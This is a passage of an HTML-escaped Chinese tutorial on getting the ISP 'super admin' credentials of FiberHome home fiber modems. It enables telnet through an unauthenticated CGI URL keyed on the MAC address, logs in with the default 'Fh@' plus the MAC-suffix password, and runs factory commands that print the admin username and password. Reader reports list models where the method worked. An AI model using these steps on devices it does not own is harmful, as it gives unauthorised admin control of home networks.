data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #EE230D&quot;&gt;4、这一步，别急着删冒号！&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #EE230D&quot;&gt;理论上每个冒号之间又会有2个字符，但是在这串MAC里面，你发现有两个冒号只有一个“5”&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #EE230D&quot;&gt;此时你需要默默地在这个5前面补一个0&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;变成了54:e0:05:2a:4f:20&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;5、现在，请你把所有字母变成大写，并把冒号删掉，变成了54E0052A4F20&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;text-align: center&quot;&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 24px&quot;&gt;第二步&amp;nbsp;开启Telnet&lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;1、在浏览器中输入http:/192.168.1.1/cgi-bin/telnetenable.cgi?telnetenable=1&amp;amp;key=&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;2、把你刚刚编辑过的MAC加到这堆东西后面，就变成了&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;http:/192.168.1.1/cgi-bin/telnetenable.cgi?telnetenable=1&amp;amp;key=&lt;/span&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;54E0052A4F20&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;3、&lt;/span&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;此时，你应该看到“telnet开启”&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;picture style=&quot;width: 94px;height: 36px;display: inline-block;vertical-align: middle;border-radius: inherit&quot;&gt;&lt;source type=&quot;image/avif&quot; srcset=&quot;//i0.hdslb.com/bfs/article/55239d63554f751744410dc6a886a61728ae4f63.png@188w_72h.avif&quot;/&gt;&lt;source type=&quot;image/webp&quot; srcset=&quot;//i0.hdslb.com/bfs/article/55239d63554f751744410dc6a886a61728ae4f63.png@188w_72h.webp&quot;/&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502191739935887851722.jpg&quot; alt=&quot;1739935884537.jpg&quot;/&gt;&lt;/picture&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #999999&quot;&gt;你应该看到这个&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;如果浏览器显示“操作错误”，那么就是MAC没有获取对&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;text-align: center&quot;&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 24px&quot;&gt;第三步 获取超级密码&lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;1、打开cmd（Windows）或者 Terminal终端（macOS）&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;2、执行&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;figure style=&quot;margin: 20px 0px 0px;padding: 0px&quot;&gt;&lt;pre class=&quot; language-shell&quot; style=&quot;overflow-wrap: normal;background-color: rgb(245, 242, 240);font-family: Consolas, Monaco, &amp;#39;Andale Mono&amp;#39;, &amp;#39;Ubuntu Mono&amp;#39;, monospace;font-size: 14px;hyphens: none;line-height: 1.5;text-shadow: rgb(255, 255, 255) 0px 1px;word-spacing: normal;margin-top: 0px;margin-bottom: 0px;overflow: auto;padding: 1em&quot;&gt;telnet&amp;nbsp;192.168.1.1&lt;/pre&gt;&lt;/figure&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;你应该看到login：&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;picture style=&quot;width: 199px;height: 64px;display: inline-block;vertical-align: middle;border-radius: inherit&quot;&gt;&lt;source type=&quot;image/avif&quot; srcset=&quot;//i0.hdslb.com/bfs/article/014836c318cad5ef8884b42e3d4f46a7ff6a0e8e.png@398w_128h.avif&quot;/&gt;&lt;source type=&quot;image/webp&quot; srcset=&quot;//i0.hdslb.com/bfs/article/014836c318cad5ef8884b42e3d4f46a7ff6a0e8e.png@398w_128h.webp&quot;/&gt;&lt;img class=&quot;loadingclass&quot; id=&quot;loading_m7bcvl3u&quot; src=&quot;https://www.qxhut.cn/zb_users/plugin/ly_ueditor_plus/ueditor-plus/themes/default/images/spacer.gif&quot;/&gt;&lt;/picture&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #999999&quot;&gt;你应该看到这个&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;3、然后，在login:后面执行&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;figure style=&quot;margin: 20px 0px 0px;padding: 0px&quot;&gt;&lt;pre class=&quot; language-shell&quot; style=&quot;overflow-wrap: normal;background-color: rgb(245, 242, 240);font-family: Consolas, Monaco, &amp;#39;Andale Mono&amp;#39;, &amp;#39;Ubuntu Mono&amp;#39;, monospace;font-size: 14px;hyphens: none;line-height: 1.5;text-shadow: rgb(255, 255, 255) 0px 1px;word-spacing: normal;margin-top: 0px;margin-bottom: 0px;overflow: auto;padding: 1em&quot;&gt;admin&lt;/pre&gt;&lt;/figure&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;对话框会提示你输入密码&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;在Password:后面输入Fh@加上你获取的MAC的后6位，比如说我这里就是Fh@2A4F20&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;这时，对话框会出现一个#&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: rgb(238, 35, 13)&quot;&gt;注：输密码的时候不显示密码是正常现象（密码保护机制），如果怕输错可以用记事本编辑好密码之后复制粘贴。&lt;/strong&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: rgb(238, 35, 13)&quot;&gt;粘贴时要用右键，不要用Ctrl-V！&lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;4、分别尝试两种指令&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;①尝试执行&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;figure style=&quot;margin: 20px 0px 0px;padding: 0px&quot;&gt;&lt;pre class=&quot; language-shell&quot; style=&quot;overflow-wrap: normal;background-color: rgb(245, 242, 240);font-family: Consolas, Monaco, &amp;#39;Andale Mono&amp;#39;, &amp;#39;Ubuntu Mono&amp;#39;, monospace;font-size: 14px;hyphens: none;line-height: 1.5;text-shadow: rgb(255, 255, 255) 0px 1px;word-spacing: normal;margin-top: 0px;margin-bottom: 0px;overflow: auto;padding: 1em&quot;&gt;load_cli&amp;nbsp;factory&amp;nbsp;show&amp;nbsp;admin_name&amp;nbsp;show&amp;nbsp;admin_pwd&lt;/pre&gt;&lt;/figure&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;对话框会显示&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;picture style=&quot;width: 274px;height: 95px;display: inline-block;vertical-align: middle;border-radius: inherit&quot;&gt;&lt;source type=&quot;image/avif&quot; srcset=&quot;//i0.hdslb.com/bfs/article/36aad28de454b089cd3b4ad710cce0e80e980659.png@548w_190h.avif&quot;/&gt;&lt;source type=&quot;image/webp&quot; srcset=&quot;//i0.hdslb.com/bfs/article/36aad28de454b089cd3b4ad710cce0e80e980659.png@548w_190h.webp&quot;/&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502191739935863788365.jpg&quot; alt=&quot;1739935860430.jpg&quot;/&gt;&lt;/picture&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #999999&quot;&gt;成功！&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;admin_name=后面的内容就是超级户名，admin_pwd=后面的内容就是超级密码。&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: rgb(238, 35, 13)&quot;&gt;②如果对话框显示Unknown command，在上一步的基础上请尝试以下指令：&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;figure style=&quot;margin: 20px 0px 0px;padding: 0px&quot;&gt;&lt;pre class=&quot; language-shell&quot; style=&quot;overflow-wrap: normal;background-color: rgb(245, 242, 240);font-family: Consolas, Monaco, &amp;#39;Andale Mono&amp;#39;, &amp;#39;Ubuntu Mono&amp;#39;, monospace;font-size: 14px;hyphens: none;line-height: 1.5;text-shadow: rgb(255, 255, 255) 0px 1px;word-spacing: normal;margin-top: 0px;margin-bottom: 0px;overflow: auto;padding: 1em&quot;&gt;exit&amp;nbsp;cfg_cmd&amp;nbsp;get&amp;nbsp;InternetGatewayDevice.DeviceInfo.X_CMCC_TeleComAccount.Username&amp;nbsp;cfg_cmd&amp;nbsp;get&amp;nbsp;InternetGatewayDevice.DeviceInfo.X_CMCC_TeleComAccount.Password&lt;/pre&gt;&lt;/figure&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;对话框会显示&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;picture style=&quot;width: 568px;height: 214px;display: inline-block;vertical-align: middle;border-radius: inherit&quot;&gt;&lt;source type=&quot;image/avif&quot; srcset=&quot;//i0.hdslb.com/bfs/new_dyn/watermark/4d2fa26c3cbf0a5e4df02010a25243fe521361612.png@1136w_428h.avif&quot;/&gt;&lt;source type=&quot;image/webp&quot; srcset=&quot;//i0.hdslb.com/bfs/new_dyn/watermark/4d2fa26c3cbf0a5e4df02010a25243fe521361612.png@1136w_428h.webp&quot;/&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164444_68073.webp&quot; loading=&quot;lazy&quot; data-onload=&quot;bmgCmptOnload&quot; data-onerror=&quot;bmgCmptOnerror&quot; style=&quot;border-radius: inherit;display: block;width: 568px;height: 214px;object-fit: inherit&quot;/&gt;&lt;/picture&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;get success!value=后面的内容就是超级用户名和超级密码。&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;5、访问192.168.1.1，把账户名和密码输进去，就进入管理员模式啦！&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve; text-align: center;&quot;&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;问题解答：
Q：输入telnet 192.168.1.1 时提示“telnet不是内部或外部程序”
A：Windows用户请去Windows功能中开启“Telnet客户端”
macOS用户请去Terminal终端输入brew install telnet（不会有人没有brew吧）
Q：admin输入完之后无法输入密码
A：这是密码保护机制，输密码的时候是看不见的，你只管输入，输完回车即可（可用记事本编辑好密码之后复制粘贴）
Q：输完用户名和密码之后提示Login incorrect
A：用户名或密码有误，请检查大小写与拼写&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;北京HG6045F3可用&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;吉林移动，智能家庭网关类型18，HG6042A&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;福建移动HG6042A1测试成功&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;福建移动,光猫型号烽火HG6201M,用户名root,密码Fh@MAC地址后六位(大写),亲测成功,希望帮到更多的人.&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;广东移动HG6142A1成功&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;广东移动HG6042A2成功了，原来不是在工厂模式里输入cfg_cmd命令，显示“$”的时候输入就好了&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;重庆移动HG6042A1成功&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;连云港移动HG6042A1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: 